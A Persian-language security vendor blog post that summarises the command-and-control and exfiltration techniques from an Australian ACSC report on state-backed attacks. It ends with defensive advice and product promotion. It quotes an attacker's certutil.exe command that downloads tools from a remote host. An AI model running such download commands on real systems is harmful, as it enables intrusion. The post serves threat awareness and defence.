چندی پیش نخست وزیر استرالیا اسکات موریسون اعلام کرد دولت و نهادهای این کشور به صورت مستمر هدف حملات امنیتی از سوی دولت چین قرار دارند. در همین راستا سازمان امنیت سایبری استرلیا ACSC گزارش مفصلی در ارتباط با جزئیات فنی این حملات منتشر نمود. مطالعه چنین گزارش‌هایی که حاصل تحقیق و بررسی‌های سازمان‌های معتبری مانند ACSC می‌باشد به تیم شبکه و امنیت سازمان‌ها دیدگاه خوبی از حملات امنیتی خواهد داد. از این رو و به دلیل اهمیت این گزارش در سه قسمت و به زبان فارسی خلاصه‌ای از آن را در بخش گزارشات امنیتی آرمان داده پویان تهیه کردیم.

در قسمت اول از این گزارش به بررسی این کمپین، نحوه گرفتن دسترسی مهاجمان، روش‌های اجرای کد و چگونگی حفظ دسترسی بعد از نفوذ به شبکه قربانی پرداختیم. در قسمت دوم به برررسی راهکارهایی پرداختیم که مهاجمین برای شناسایی نشدن توسط راهکارهای امنیتی به کار برده‌اند. همچنین روش مهاجمین در حملات اخیر استرلیا برای به دست آوردن اطلاعات احراز هویت قربانیان، نفوذ و حرکت بیشتر در شبکه هدف و در آخر نیز چونگی جمع‌آوری داده‌ها و اطلاعات را مورد بررسی قرار دادیم. در بخش پایانی چگونگی ارتباط مهاجمین با سرور فرمان و کنترل و روش‌های استخراج داده مورد استفاده در این حملات مورد بررسی قرار گرفته است.

پروتکل لایه کاربردی استاندارد

تحقیقات ACSC نشان می‌دهد که استفاده از پوسته وب با ترافیک استاندارد HTTP/HTTPS اصلی‌ترین ابزار مهاجمین برای ارتباط با سرور فرمان و کنترل می‌باشد. مهاجمین معمولاً از متد POST و GET برای این منظور استفاده کرده‌اند. ابزار مورد استفاده برای این ارتباطات در صورتی که مرورگر نباشد از طریق ابزارهای غیرمعمول python-requests/2.2.1 و CPython/2.7.2 می‌باشد.

پروکسی

طبق شواهد موجود، مهاجمین از پوسته وب به عنوان پروکسی SOCKS استفاده نموده تا از طریق تونل SMB یک میزبان خارجی را به میزبان داخلی در شبکه متصل نمایند.

سرویس وب

استفاده از سرویس‌های تحت وب معتبر به عنوان عنصر کلیدی در ارتباط با سرور فرمان و کنترل (C&C) توسط مهاجمین شناخته می‌شوند. برای مثال بدافزار LibraryPSE که در یک سند Word جاسازی شده است از سرویس ابری OneDrive سربارها و دستورات اضافی را دریافت می‌کند. آدرس سرور فرمان و کنترل (C&C) این بدافزار https://api.onedrive.com/v1.0/shares//driveitem/content می‌باشد. همچنین بدافزار HTTPCore دستورات خود را از یک سرویس معتبر وب (در استرالیا) دریافت می‌کرد.

انتقال فایل‌ها از راه دور

علاوه بر روش کپی فایل‌ها از راه دور که پیش‌تر از آن به عنوان روشی برای حرکت در شبکه قربانی یاد شده بود، شواهدی وجود دارد که نشان می‌دهد مهاجمین از این روش برای سوءاستفاده از ابزار certutil.exe به منظور دانلود سایر ابزارها در سیستم قربانی استفاده می‌کنند. دستور زیر نمونه‌ای از این موارد را نشان می‌دهد:

certutil.exe  -urlcache  -split  -f  https://192.0.2.1:443/x.php  c:\x.txt

پروکسی Multi-hop

بررسی‌ها نشان می‌دهد که مهاجمین به وفور از شبکه Tor برای اقداماتی از قبیل شمارش عناصر شبکه، پویش آسیب‌پذیری‌ها و سایر فعالیت‌های مرتبط با اکسپلویت‌ها استفاده نموده‌اند.

سایر روش‌های مرتبط با سرور فرمان و کنترل

سایر روش‌های شناسایی شده عبارتند از: پروتکل‌های استاندارد رمزنگاری، استفاده از پورت‌های رایج، رمزنگاری چندلایه و کدگذاری داده‌ها

کانال‌های ارتباطی سرورهای C&C

داده‌های استخراج شده از سرورهای فرمان و کنترل (C&C) توسط مهاجمین شامل کانال‌های ارتباطی پوسته‌های وب و کانال‌های HTTPCore می‌باشند. برای شناسایی این کانال‌ها می‌بایست لاگ‌های ذخیره شده در فایروال و پروکسی اینترنت مورد بررسی قرار گرفته و ترافیک رد و بدل شده در شبکه ذخیره و بازبینی گردند.

پروتکل‌های جایگزین

طبق شواهد موجود، ارتباطاتی نیز از کانال‌های غیر C&C توسط مهاجمین برقرار گردیده است که از آن‌ها برای دانلود مستقیم فایل از اینترنت استفاده شده است.

سایر روش‌های شناسایی شده

مهاجمین از روش‌های دیگری مثل داده‌های فشرده‌سازی شده و رمزگذاری شده برای استخراج داده‌ها از سرور فرمان و کنترل استفاده نموده‌اند که بدلیل نبود جزئیات کافی به آن‌ها پرداخته نشده است.

در حملات اخیر که با پشتوانه دولتی و به صورت هدفمند بر ضد نهاد‌ها و سازمان‌های استرلیا انجام شده است، مهاجمین برای نفوذ از آسیب‌پذیری‌های موجود در نرم افزارها و سرویس‌هایی استفاده کرده‌اند که از طریق اینترنت قابل دسترس بوده‌اند. یافتن آسیب‌پذیری‌ها با استفاده از پویشگرها‌ی آسیب‌پذیری، انجام تست نفوذ شبکه به صورت دوره‌ای و همچنین استفاده از راهکارهای مدیریت آسیب‌پذیری و نصب به موقع وصله‌های امنیتی همگی در کاهش سطح آسیب‌پذیری در برابر چنین حملاتی بسیار موثر هستند. البته باید توجه داشته باشید تنها وجود آسیب‌پذیری در نرم افزارها و سیستم‌هایی که از طریق اینترنت قابل دسترسی هستند اهمیت ندارد بلکه آسیب‌پذیری‌های تجهیزات، نرم‌افزارها و سرویس‌های داخل شبکه نیز اهمیت بسیاری دارند. همانطور که در گزارش مرکز امنیت سایبری استرلیا نیز خواندید مهاجمین بعد از نفوذ برای بالا بردن سطح دسترسی‌شان و یا حفظ دسترسی خود از آسیب‌پذیری‌های موجود در شبکه هدف استفاده کردند.

همچنین مهاجمین برای نفوذ از حملات فیشینگ استفاده کرده‌اند که در این خصوص استفاده از خدمات اختصاصی آگاهی رسانی برای کاهش خطای انسانی و جلوگیری از حملات فیشینگ موفق بسیار موثر است. در کنار این خدمات استفاده از راهکارهایی مانند KSMG توصیه می‌گردد.

در این حملات از روش‌های مختلفی مانند مبهم سازی و یا Software packing برای مخفی ماندن از دید راهکارهای امنیتی استفاده شده است. در نتیجه راهکارهای سنتی نمی‌توانند در شناسایی حملات هدفمند و پیشرفته چندان موثر باشند، بلکه استفاده از راهکارهای هوشمندی مانند کاتا کسپرسکی را به شما پیشنهاد می‌نماییم.

آرمان داده پویان با بهره‌گیری از متخصصین امنیت و شبکه آماده ارائه خدمات طراحی و پیاده‌سازی طرح‌های جامع امنیتی برای سازمان شما می‌باشد.